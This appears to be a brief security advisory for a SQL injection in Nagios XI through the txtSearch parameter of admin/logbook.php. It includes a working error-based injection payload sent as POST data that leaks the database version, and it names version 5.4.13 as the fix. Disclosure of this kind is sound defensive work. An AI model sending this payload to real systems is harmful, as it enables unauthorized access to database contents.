A SQL injection issue was discovered in Nagios XI via the admin/logbook.php txtSearch parameter.
http://xxxx/nagiosql/admin/logbook.php
postdata: txtSearch=-1%' and (select 1 from(select count(*),concat((select (select (select concat(0x7e,version(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#
Upgrade to version 5.4.13